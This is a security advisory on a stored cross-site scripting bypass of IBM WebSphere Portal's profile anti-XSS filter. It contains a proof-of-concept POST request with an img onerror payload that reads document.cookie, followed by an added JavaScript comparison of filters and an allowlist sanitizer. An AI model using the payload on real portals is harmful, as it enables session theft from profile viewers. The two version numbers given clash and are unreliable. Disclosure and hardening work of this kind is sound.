SSD Advisory – IBM WebSphere Portal Cross-Site Scripting (XSS)
The following advisory describes a Cross-Site Scripting (XSS) vulnerability found in WebSphere Portal version 18.104.22.168.
IBM WebSphere Portal products provide enterprise web portals that help companies deliver a highly-personalized, social experience for their customers. WebSphere Portal products give users a single point of access to the applications, services, information and social connections they need. These products help increase visitor response and reduce web operations cost while offering a range of capabilities to meet your business needs.
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
We notified IBM of the vulnerability in September 2016; repeated attempts to re-establish contact and obtain a status for a patch went unanswered. At the time of publication there is no solution or workaround for this vulnerability.
IBM WebSphere Portal version 22.214.171.124 suffers from an input validation issue that allows the built-in anti Cross-Site Scripting (XSS) mechanism to be bypassed. That mechanism is meant to filter potentially malicious HTML tags out of a user's profile details when the profile is updated. Because the filtered value is stored and later rendered, the bypass gives an authenticated user a stored XSS: script planted in the profile runs in the browser of anyone who views it, and can be used to steal the victim's session cookie or to issue forged requests (CSRF) with the victim's session.
Proof of Concept
POST /profiles/ajax/editMyProfile.do?lang=en_us HTTP/1.1
Host: 192.168.1.200
User-Agent: Mozilla/5.0 (xxxx)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.200/profiles/html/editMyProfileView.do?tab=aboutMe&lang=en_us
Content-Length: 258
Cookie: *cookies here*
Connection: keep-alive
Cache-Control: no-cache

dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe&attribute(description)=%3Cp%20dir%3D%22ltr%22%3E%0A%09%3Cstrong%3EAAAAA%3C%2Fstrong%3E%3C%2Fp%3E%0A&attribute(experience)=<img%20src=x%20xxxx%20onerror="alert(document.cookie)"%2f%2f%
The dangerousurlnonce value and the Cookie header above are placeholders for the values of the attacker's own authenticated session. URL-decoded, the attribute(experience) value submitted as the "About me" field is:

<img src=x xxxx onerror="alert(document.cookie)"//%
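The following is an added example, not code from the advisory or from IBM. It takes the two field values from the PoC above and contrasts a hypothetical strict, pattern-based filter (the kind that strips on* handlers only from tags it can fully parse and treats everything else as plain text) with a lenient, browser-style tokenizer, then shows an allowlist-based rendering of the rich-text field. The strict filter, the tokenizer and the allowlist are illustrative and are not WebSphere Portal's implementation; the assumption that markup following the field closes the unterminated <img> tag is noted in the code.

```javascript
// Added example, not code from the SSD advisory or from IBM WebSphere Portal:
// a hypothetical strict anti-XSS filter versus a browser-like tokenizer, run
// over the two field values from the PoC request.

// Decoded "experience" value from the PoC body. The trailing "%" is as captured
// in the advisory; when the profile page renders this field, the markup that
// follows it supplies the closing ">" (an assumption about the page layout).
const PAYLOAD = '<img src=x xxxx onerror="alert(document.cookie)"//%';
// Decoded "description" value from the same request (benign rich text).
const BENIGN = '<p dir="ltr">\n\t<strong>AAAAA</strong></p>\n';

// Hypothetical strict filter: recognises only tags whose attributes are
// well-formed name="value" pairs and strips on* handlers from those. The
// unquoted src=x and the bare xxxx token stop the tag from matching at all,
// so the payload passes through untouched while a tidy payload is cleaned.
const STRICT_TAG = /<(\w+)((?:\s+\w+="[^"]*")*)\s*\/?>/g;
function strictFilter(html) {
  return html.replace(STRICT_TAG, (m, name, attrs) =>
    '<' + name + attrs.replace(/\s+on\w+="[^"]*"/gi, '') + '>');
}

// Lenient tokenizer modelled on browser behaviour: bare tokens are attributes
// with an empty value, quotes are optional, stray "/" between attributes is
// skipped, and an unterminated tag is still reported (see assumption above).
// Returns [{name, closing, attrs: [[attrName, value], ...], start, end}].
function tokenizeTags(html) {
  const tags = [];
  const re = /<(\/?)([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    let i = m.index + m[0].length;
    const attrs = [];
    while (i < html.length && html[i] !== '>') {
      if (/[\s\/]/.test(html[i])) { i++; continue; }
      let name = '', value = '';
      while (i < html.length && !/[\s\/>=]/.test(html[i])) name += html[i++];
      if (html[i] === '=') {
        const q = html[++i];
        if (q === '"' || q === "'") {
          i++;
          while (i < html.length && html[i] !== q) value += html[i++];
          i++;                                   // skip the closing quote
        } else {
          while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
        }
      }
      attrs.push([name.toLowerCase(), value]);
    }
    tags.push({ name: m[2].toLowerCase(), closing: m[1] === '/', attrs,
                start: m.index, end: Math.min(i + 1, html.length) });
    re.lastIndex = i + 1;
  }
  return tags;
}

// Event handlers a browser would wire up, whatever the strict filter believed.
function findEventHandlers(html) {
  const found = [];
  for (const t of tokenizeTags(html))
    if (!t.closing)
      for (const [a, v] of t.attrs)
        if (a.startsWith('on')) found.push(`${t.name}.${a}=${v}`);
  return found;
}

// Hardened rendering for a rich-text profile field: rebuild the markup from the
// tokenizer's own parse, keep only allowlisted tags and attributes, and
// entity-encode everything else, including any tag that is not on the list.
const ALLOWED = { p: ['dir'], strong: [], em: [], br: [] };   // illustrative list
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function sanitize(html) {
  let out = '', pos = 0;
  for (const t of tokenizeTags(html)) {
    out += escapeHtml(html.slice(pos, t.start));
    const allowed = ALLOWED[t.name];
    if (allowed === undefined) {
      out += escapeHtml(html.slice(t.start, t.end)); // unknown tag becomes text
    } else if (t.closing) {
      out += `</${t.name}>`;
    } else {
      const attrs = t.attrs.filter(([a]) => allowed.includes(a))
        .map(([a, v]) => ` ${a}="${escapeHtml(v)}"`).join('');
      out += `<${t.name}${attrs}>`;
    }
    pos = t.end;
  }
  return out + escapeHtml(html.slice(pos));
}

console.log('strict filter output :', strictFilter(PAYLOAD));
console.log('browser would run    :', findEventHandlers(strictFilter(PAYLOAD)));
console.log('sanitized payload    :', sanitize(PAYLOAD));
console.log('sanitized rich text  :', sanitize(BENIGN));
```

Run with node. The point is the mismatch: a filter that decides what counts as a tag more strictly than the browser does will pass exactly the inputs the browser is most forgiving of, so the fix is not a tighter pattern but entity-encoding on output and, where markup is required, an allowlist sanitizer that re-serializes from its own parse (for Java applications, the OWASP Java HTML Sanitizer is the usual choice).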